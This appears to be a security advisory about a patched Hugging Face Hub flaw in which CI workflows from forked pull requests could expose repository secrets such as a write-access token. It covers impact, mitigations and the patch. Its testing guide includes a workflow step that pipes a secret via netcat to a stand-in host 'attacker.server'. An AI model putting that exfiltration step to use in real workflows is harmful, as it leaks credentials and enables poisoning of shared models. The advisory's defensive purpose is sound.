Cross-Tenant Secret Exfiltration in Hugging Face Hub via Insecure CI/CD Action Configuration
Overview
Researchers from Wiz discovered a high-impact vulnerability within the Hugging Face Hub platform that could allow attackers to gain write access to other users' model repositories. The attack exploited a weakness in how the platform's CI/CD system, which is based on GitHub Actions, handled secrets for workflows triggered by pull requests from forked repositories. An attacker could fork a popular model or dataset repository, add a malicious workflow file to their fork, and then open a pull request to the original repository. The malicious workflow was designed to print out all available environment variables and secrets. Due to a misconfiguration, secrets intended only for the original repository, including a powerful `HF_TOKEN` with write permissions, were exposed to the CI runner executing the code from the attacker's pull request. The attacker could then easily exfiltrate this token from the action logs. With the stolen write-access token, the attacker could poison the targeted model by uploading a backdoored version, steal private training data, or deface the model's public page. This vulnerability represented a significant supply chain risk for the entire AI community relying on the Hugging Face Hub for trusted models, as a single compromised popular model could have a widespread downstream impact.
Affected Systems
Testing Guide
This vulnerability was platform-level and has been patched. Testing is no longer possible. However, to test your own repository's resilience to similar issues: 1. Create a new, non-production repository on Hugging Face Hub. 2. Add a repository secret named `MY_SECRET` with a test value. 3. Fork the repository, and in your fork, add a CI workflow file that runs on `pull_request` and includes a step like `run: echo "Secret is ${{ secrets.MY_SECRET }}" | nc attacker.server 1337`. 4. Open a pull request to the original repository and check if the workflow runs and if the secret is exfiltrated.
Mitigation Steps
1. **Rotate Hugging Face Tokens**: All users, especially owners of popular repositories, should rotate their access tokens immediately as a precautionary measure. 2. **Audit Repository Actions**: Review your repository's CI/CD workflows (`.github/workflows/`) to ensure they are not using dangerous patterns that print secrets. 3. **Enable Workflow Approval**: In your repository settings on GitHub (and by extension, Hugging Face Hub), enable the setting to require approval for workflows from first-time contributors. 4. **Use Scoped Tokens**: When creating tokens for automation, grant them the narrowest possible permissions (e.g., read-only) required for the task.
Patch Details
Hugging Face rolled out a platform-wide patch that changes the permissions of the `GITHUB_TOKEN` for pull requests from forks and restricts which secrets are exposed to these workflows.